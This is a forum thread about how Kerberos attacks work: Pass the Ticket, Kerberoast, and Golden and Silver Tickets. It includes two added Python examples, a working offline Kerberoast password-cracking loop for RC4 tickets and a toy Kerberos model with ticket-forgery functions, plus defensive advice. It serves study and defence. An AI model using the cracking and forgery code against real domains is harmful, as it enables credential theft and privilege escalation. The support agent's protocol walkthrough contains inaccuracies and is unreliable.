Kerberos Attacks Questions

  • Question

  • Hey, It's amazing how many "Attacks on Kerberos" articles exist out there and almost none really explains the small details.

    My guess is that usually they assume it's basic knowledge and sometimes, they just don't know enough.

    Anyway, here are the questions:

    1. How is PtT (Pass the Ticket) possible? You can easily take someone's ticket, but to use it you need to create an Authenticator, which means you need to get one of the keys the client possesses (it depends on which step you are in) and even forge the IP address embedded in the stolen ticket.
    2. It does not sound reasonable to me that, given access to a client's computer memory, you would extract only Kerberos tickets and no session keys or clear-text/hashed passwords.
    3. If only Kerberos is used, where am I going to find any NTLM hash to commit OPtH (Over-Pass the Hash)?
    4. The RC4_HMAC_MD4 encryption is not used by default in today's Windows operating systems, so how would I use an NTLM hash in OPtH? Is a downgrade the answer?
    5. I read in some article that Kerberoast's brute-force phase is done by trying different NTLM hashes. It seemed weird, so I assumed that it is done by trying clear-text passwords, which are used to generate NTLM hashes, which in their turn are used as keys to try to decrypt the ticket's encryption. But that's not supposed to be the case: RC4_HMAC_MD4 is not used by default. AES is, and it has PBKDF2 as a hash algorithm (which is supposed to be brute-force resistant).
    6. How is a Silver Ticket done when the victim server does check the PAC against the DC?
    7. The Golden Ticket attack relies on the TGS cooperating with any given TGT? Which means that it will sign the PAC even if it's forged?

    Thank you all.

    If there is another forum similar to TechNet please let me know.

    Sunday, December 23, 2018 4:44 PM

All replies

    • Merged by Kallen Wang Monday, December 24, 2018 1:38 AM the same
    Sunday, December 23, 2018 8:20 PM
  • Hello,

    This is a quick note to let you know that I am currently performing research on this issue and will get back to you as soon as possible. I appreciate your patience.

    If you have any updates during this process, please feel free to let me know.

    Thank you for your understanding and support.

    Best Regards,

    Kallen


    Please remember to mark the replies as answers if they help.
    If you have feedback for TechNet Subscriber Support, contact tnmff@microsoft.com.

    Monday, December 24, 2018 9:47 AM
  • Hi

    Since this issue is a bit complicated, we are still working on it and will provide answers as soon as possible.

    For question 1, about Pass the Ticket, please refer to the following link for more information:

    https://attack.mitre.org/techniques/T1097/

    Please Note: Since the web site is not hosted by Microsoft, the link may change without notice. Microsoft does not guarantee the accuracy of this information.

    Thanks for your support and understanding.

    Best regards,

    Kallen



    Wednesday, December 26, 2018 9:29 AM
  • Hey,

    First of all, I thank you.

    Now, I don't see why it's complicated. I'm quite new to this subject, but those questions are supposed to be the very basics of it.


    As for question 1, the article does not mention, in any way, the creation of the authenticator message.

    "In this technique, valid Kerberos tickets for Valid Accounts are captured by Credential Dumping. A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access."


    Does Credential Dumping include getting secret keys?

    Writing that a service ticket, by itself, allows access to a resource is misleading. Same for the TGT.

    *EDIT*

    I found this thread:

    https://social.technet.microsoft.com/Forums/en-US/f1c0f823-bf4f-40f3-880a-b746f5df1053/passing-tickets-kerberos?forum=winserversecurity

    "In any case, I got the answer from Delpy a few month ago who noted that when Mimikatz extracts the tickets it also extracts the session key from memory which later on is used to create an authenticator."

    Notice the confusing, misleading answer by Ondrej Sevecek (an account with over 5000 points on this website). Probably you can only trust the exploiters to tell the whole truth.

    *EDIT*

    Thank you.

    • Edited by Beit Dagan Thursday, December 27, 2018 4:46 PM
    Wednesday, December 26, 2018 8:52 PM
  • 1. The ticket and its (session) key are stored in the same place: LSASS memory;
    2. You're right, technically I extract a KRB-CRED structure (ticket + key);
    3. I have never seen any real-life environment without NTLM at all, but even if so, the RC4 key for Kerberos in Windows is equal to the NTLM hash;
    4. Right, but even if RC4 is not used by default, it's kept for compatibility in memory/delegation tickets;
    5. Kerberoast works by asking for a TGS with explicit RC4 encryption; this is why NTLM stuff can be used against the encryption (cleartext to NTLM hash, to try to decrypt the first 16 bytes of the encrypted part of the ticket);
    6. A Silver Ticket does not work when the PAC is verified, but as mentioned in many talks, basically all Windows services don't check the PAC;
    7. I don't understand the question; a Golden Ticket is a forged TGT (krbtgt key for both signatures) sent to the KDC (DC) to obtain as many TGS as you want for all services.

    I hope all is crystal clear, if not, do not hesitate to ping me for clarifications.


    • Edited by Gentil Kiwi Saturday, December 29, 2018 12:07 AM typo
    Friday, December 28, 2018 9:04 PM
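Points 3 and 5 of the reply above, worked through in Python as an added example (this is not code from the thread, from mimikatz, or from any of the tools named on this page). The NT hash is MD4 over the UTF-16LE password, and Windows uses that same 16-byte value as the RC4-HMAC (etype 23) Kerberos key, which is why a Kerberoaster who requested an RC4 service ticket can test password guesses offline. The first 16 bytes of the ticket's enc-part are the HMAC-MD5 checksum; a guess is right when the plaintext recovered under it re-computes to that checksum, which is exactly the check hashcat mode 13100 performs. The svc_sql account, its password, the wordlist and the ticket body are constructed for the example and are not a real ticket (a real enc-part is an ASN.1 EncTicketPart); MD4 and RC4 are implemented inline because hashlib's md4 is usually disabled under OpenSSL 3.

```python
import hashlib
import hmac
import os
import struct

MASK32 = 0xFFFFFFFF
KEY_USAGE_TGS_REP_TICKET = 2  # RFC 4120 key usage for the ticket enc-part carried in a TGS-REP

def _rot(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32

def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320): hashlib's md4 is usually disabled under OpenSSL 3."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (  # (boolean function, additive constant, word order, per-step shifts)
        (lambda x, y, z: (x & y) | (~x & z), 0, range(16), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, order, shifts in rounds:
            for i, j in enumerate(order):
                a = _rot((a + fn(b, c, d) + x[j] + k) & MASK32, shifts[i % 4])
                a, b, c, d = d, a, b, c
        a, b, c, d = [(v + w) & MASK32 for v, w in zip((a, b, c, d), (aa, bb, cc, dd))]
    return struct.pack("<4I", a, b, c, d)

def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE password); Windows uses it unchanged as the RC4-HMAC (etype 23) key."""
    return md4(password.encode("utf-16-le"))

def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def _k1(key: bytes, usage: int) -> bytes:
    return hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()

def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes) -> bytes:
    """RFC 4757 RC4-HMAC: checksum(16) || RC4(K3, confounder(8) || plaintext)."""
    k1 = _k1(key, usage)
    data = os.urandom(8) + plaintext
    checksum = hmac.new(k1, data, hashlib.md5).digest()
    return checksum + rc4(hmac.new(k1, checksum, hashlib.md5).digest(), data)

def rc4_hmac_decrypt(key: bytes, usage: int, edata: bytes):
    """Plaintext when the checksum verifies, else None: a wrong key is detected, not decrypted to junk."""
    k1, checksum, body = _k1(key, usage), edata[:16], edata[16:]
    data = rc4(hmac.new(k1, checksum, hashlib.md5).digest(), body)
    ok = hmac.compare_digest(hmac.new(k1, data, hashlib.md5).digest(), checksum)
    return data[8:] if ok else None

def hashcat_13100(user: str, realm: str, spn: str, edata: bytes) -> str:
    """Line format Rubeus/GetUserSPNs emit for an etype-23 ticket: checksum and body split by '$'."""
    return f"$krb5tgs$23$*{user}${realm}${spn}*${edata[:16].hex()}${edata[16:].hex()}"

def kerberoast(edata: bytes, wordlist):
    """Offline phase: candidate -> NT hash -> try the enc-part. No DC traffic, so no lockouts, no 4771s."""
    for candidate in wordlist:
        if rc4_hmac_decrypt(nt_hash(candidate), KEY_USAGE_TGS_REP_TICKET, edata) is not None:
            return candidate
    return None

# Constructed sample: the enc-part the TGS would have produced under the service account's key.
# A real ticket is an ASN.1 EncTicketPart; this stand-in is enough to exercise the crack loop.
SERVICE_PASSWORD = "Summer2018!"   # hypothetical weak password of a hypothetical svc_sql account
TICKET_BODY = b"EncTicketPart{cname=alice, sname=MSSQLSvc/sql01, pac=<PAC>}"
SAMPLE_TICKET = rc4_hmac_encrypt(nt_hash(SERVICE_PASSWORD), KEY_USAGE_TGS_REP_TICKET, TICKET_BODY)
WORDLIST = ["Password1", "Welcome1", "Summer2018!", "Winter2019!"]

if __name__ == "__main__":
    print(hashcat_13100("svc_sql", "CORP.LOCAL", "MSSQLSvc/sql01.corp.local:1433", SAMPLE_TICKET))
    print("cracked:", kerberoast(SAMPLE_TICKET, WORDLIST))
```

The cost per guess here is one MD4 plus two HMAC-MD5s and an RC4 key schedule, which is why RC4 tickets crack at GPU speed. An account restricted to AES (msDS-SupportedEncryptionTypes without RC4) never takes this path: the TGS answers with etype 17/18 and every guess costs a PBKDF2 derivation of 4096 iterations, which is the practical reason to remove RC4 from service accounts and to alert on 4769 events that request TicketEncryptionType 0x17.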
  • Almost all crystal clear. Just a few loose ends.

    5. Is RC4 the easiest etype to brute-force?

    7. You forge a TGT (and the PAC inside), you send it to the KDC (TGS), and it should take the PAC within and copy it to the new service ticket. But no checks are done? It signs the PAC with the target server's secret, so I thought it would go the extra mile and do a check to ensure the PAC is valid.

    Do you know why the PAC is inserted in the TGT in the first place? It seems a bit unnecessary.

    Just for luck (not related to the subject): TGS_REQ where the sname is krbtgt happens a lot in my network. What's the deal?

    Saturday, December 29, 2018 12:36 PM
  • Hi,

    Before we go further, let me explain Kerberos authentication in more detail for you:

    Kerberos authentication normally has the 6 steps below; I will explain these 6 steps for the case where we want to access a shared folder in an Active Directory environment.

    Let's assume there is user A who logs in to client B and wants to access the shared folder on C, and there is DC D in our Active Directory. The Kerberos authentication steps are as below:

    AS Phase:

    1. User A will send an AS request to DC D including:
      1. UPN
      2. Domain name the user belongs to
      3. Pre-authentication encrypted with the user's password hash
    2. DC D will hash the user's password and decrypt the pre-authentication; in the pre-authentication, a time stamp will be verified: if less than 5 minutes, verification passes; if more than 5 minutes, it fails.
    3. DC D will reply to client B with the information below:
      1. Ticket hashed with the user's password hash, and the TGS session key
      2. TGT hashed with the TGS key; the TGT includes the TGS session key and authorization data.
    4. Client A will decrypt the ticket and get the TGS session key.

    TGT Phase:

    1. The client sends the TGS request to DC D including:
      1. SPN of server C
      2. The domain name of target server C
      3. TGT
      4. New time stamp encrypted with the TGS session key
    2. DC D will decrypt the TGT with the TGS key, get the TGS session key, and decrypt the new time stamp with the TGS session key to verify whether the time is less than 5 minutes or not: if less than 5 minutes, pass; more than 5 minutes, fail.
    3. DC D will reply to client A including:
      1. Ticket and new session key (used for communication between client A and target server C) encrypted with the TGS session key
      2. Service ticket encrypted with the service key (from target server C), including the new session key and authorization data from the TGT
    4. Client A will decrypt with the TGS session key and get the ticket and new session key, and the service ticket encrypted with the service key.

    AP Phase:

    1. Client A will send a request to server C including:
      1. Flag to determine whether we will use the session key
      2. Flag to determine whether two-sided authentication is needed
      3. Service ticket
      4. New time stamp encrypted with the new session key
    2. Server C will decrypt the service ticket with its service key and get the new session key, then decrypt the new time stamp with the new session key; if the time is less than 5 minutes, pass, otherwise fail.

    Answering your question:

    May I know whether by PAC you mean "Authorization data"? If yes, then the PAC will not be validated.

    The PAC is released by DC D to client A in the AS phase, then client A will send the PAC to target server C in the AP phase; finally, only target server C gets this PAC, and target C will confirm client A is trusted.

    The sname krbtgt: this service account is the default account for the KDC service.

    Best Regards ,

    Kallen



    Friday, January 4, 2019 6:53 AM
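The three exchanges walked through above (AS, TGS, AP), modelled end to end in Python as an added example; this is not code from the thread or from any Windows component. It uses a toy encrypt-then-MAC seal() in place of a real Kerberos etype, the hypothetical principals alice, krbtgt and cifs/fs01, and a plain dict in place of the PAC. The point is to make the thread's answers to questions 1, 6 and 7 concrete: a service ticket on its own is useless because the authenticator must be encrypted under the session key that was issued with it, so a dumped KRB-CRED (ticket plus key) replayed from another host works, which is Pass the Ticket; the KDC copies the PAC out of whatever the krbtgt key decrypts, so a forged TGT yields real service tickets, which is the Golden Ticket; and a service that never validates the PAC with the DC accepts whatever its own key decrypts, which is the Silver Ticket. The 5-minute clock-skew check from the walkthrough is included as MAX_SKEW.

```python
import hashlib
import hmac
import json
import os
import time

MAX_SKEW = 300                                         # Kerberos default clock-skew tolerance, seconds
KRBTGT, ALICE, CIFS = "krbtgt", "alice", "cifs/fs01"   # hypothetical principals for the model

def _xor(key: bytes, nonce: bytes, data: bytes) -> bytes:
    stream = b"".join(hashlib.sha256(key + nonce + i.to_bytes(4, "big")).digest()
                      for i in range(0, len(data), 32))
    return bytes(p ^ k for p, k in zip(data, stream))

def seal(key: bytes, obj: dict) -> bytes:
    """Toy encrypt-then-MAC standing in for a Kerberos etype; it is not RC4-HMAC or AES-CTS."""
    nonce = os.urandom(16)
    ct = _xor(key, nonce, json.dumps(obj).encode())
    return nonce + ct + hmac.new(key, nonce + ct, hashlib.sha256).digest()

def unseal(key: bytes, blob: bytes) -> dict:
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(hmac.new(key, nonce + ct, hashlib.sha256).digest(), tag):
        raise ValueError("wrong key or tampered ciphertext")
    return json.loads(_xor(key, nonce, ct))

def authenticator(session_key: str, cname: str) -> bytes:
    """Encrypted under the session key, so a stolen ticket without that key cannot produce one."""
    return seal(bytes.fromhex(session_key), {"cname": cname, "ts": time.time()})

def _check(auth: dict, ticket: dict) -> None:
    if auth["cname"] != ticket["cname"] or abs(time.time() - auth["ts"]) > MAX_SKEW:
        raise ValueError("authenticator does not match the ticket or is outside clock skew")

class KDC:
    def __init__(self):
        self.keys = {p: os.urandom(16) for p in (KRBTGT, ALICE, CIFS)}   # long-term keys

    def as_exchange(self, cname: str, preauth: bytes):
        """AS-REQ/AS-REP: pre-auth is a timestamp under the user's key; the reply carries the TGT
        (sealed with the krbtgt key) and the TGS session key (sealed with the user's key)."""
        if abs(time.time() - unseal(self.keys[cname], preauth)["ts"]) > MAX_SKEW:
            raise ValueError("pre-authentication failed")
        sk, pac = os.urandom(16).hex(), {"user": cname, "groups": ["Domain Users"]}
        tgt = seal(self.keys[KRBTGT], {"cname": cname, "key": sk, "pac": pac})
        return tgt, seal(self.keys[cname], {"key": sk})

    def tgs_exchange(self, tgt: bytes, auth: bytes, spn: str):
        """TGS-REQ/TGS-REP: whatever the krbtgt key decrypts is trusted; its PAC is copied, not rebuilt."""
        t = unseal(self.keys[KRBTGT], tgt)
        _check(unseal(bytes.fromhex(t["key"]), auth), t)
        sk = os.urandom(16).hex()
        st = seal(self.keys[spn], {"cname": t["cname"], "key": sk, "pac": t["pac"]})
        return st, seal(bytes.fromhex(t["key"]), {"key": sk})

def ap_exchange(service_key: bytes, service_ticket: bytes, auth: bytes) -> dict:
    """AP-REQ at the service: decrypt with the service key, check the authenticator, and authorize
    on the PAC without asking the DC, which is what the thread says Windows services do by default."""
    t = unseal(service_key, service_ticket)
    _check(unseal(bytes.fromhex(t["key"]), auth), t)
    return t["pac"]

def get_service_ticket(kdc: KDC, user: str, spn: str):
    """The legitimate client path; the result is the KRB-CRED pair (ticket, session key)."""
    tgt, enc = kdc.as_exchange(user, seal(kdc.keys[user], {"ts": time.time()}))
    tgs_key = unseal(kdc.keys[user], enc)["key"]
    st, enc = kdc.tgs_exchange(tgt, authenticator(tgs_key, user), spn)
    return st, unseal(bytes.fromhex(tgs_key), enc)["key"]

def pass_the_ticket(kdc: KDC, krb_cred, cname: str) -> dict:
    """A dumped KRB-CRED replayed from any host works: the session key travelled with the ticket."""
    return ap_exchange(kdc.keys[CIFS], krb_cred[0], authenticator(krb_cred[1], cname))

def ticket_only_is_rejected(kdc: KDC, st: bytes) -> bool:
    """The ticket alone, with a guessed session key, cannot build a valid authenticator."""
    try:
        ap_exchange(kdc.keys[CIFS], st, authenticator(os.urandom(16).hex(), ALICE))
    except ValueError:
        return True
    return False

def golden_ticket(kdc: KDC, krbtgt_key: bytes) -> dict:
    """Forge a TGT with the krbtgt key; the KDC copies its bogus PAC into a real service ticket."""
    sk, pac = os.urandom(16).hex(), {"user": "nobody", "groups": ["Domain Admins"]}
    forged = seal(krbtgt_key, {"cname": "nobody", "key": sk, "pac": pac})
    st, enc = kdc.tgs_exchange(forged, authenticator(sk, "nobody"), CIFS)
    return ap_exchange(kdc.keys[CIFS], st, authenticator(unseal(bytes.fromhex(sk), enc)["key"], "nobody"))

def silver_ticket(service_key: bytes) -> dict:
    """Forge the service ticket itself with the service key; the KDC never sees this one."""
    sk, pac = os.urandom(16).hex(), {"user": "nobody", "groups": ["Domain Admins"]}
    forged = seal(service_key, {"cname": "nobody", "key": sk, "pac": pac})
    return ap_exchange(service_key, forged, authenticator(sk, "nobody"))
```

Two things the model makes visible that the prose walkthrough does not: the TGS-REQ for a new service ticket is itself an AP exchange against the krbtgt service (ticket plus authenticator), which is why a TGS_REQ with sname krbtgt is normal traffic; and nothing in tgs_exchange or ap_exchange consults the directory about the PAC, so the only defences against the two forgeries are protecting the krbtgt and service keys and, for the silver case, enabling PAC validation at the service.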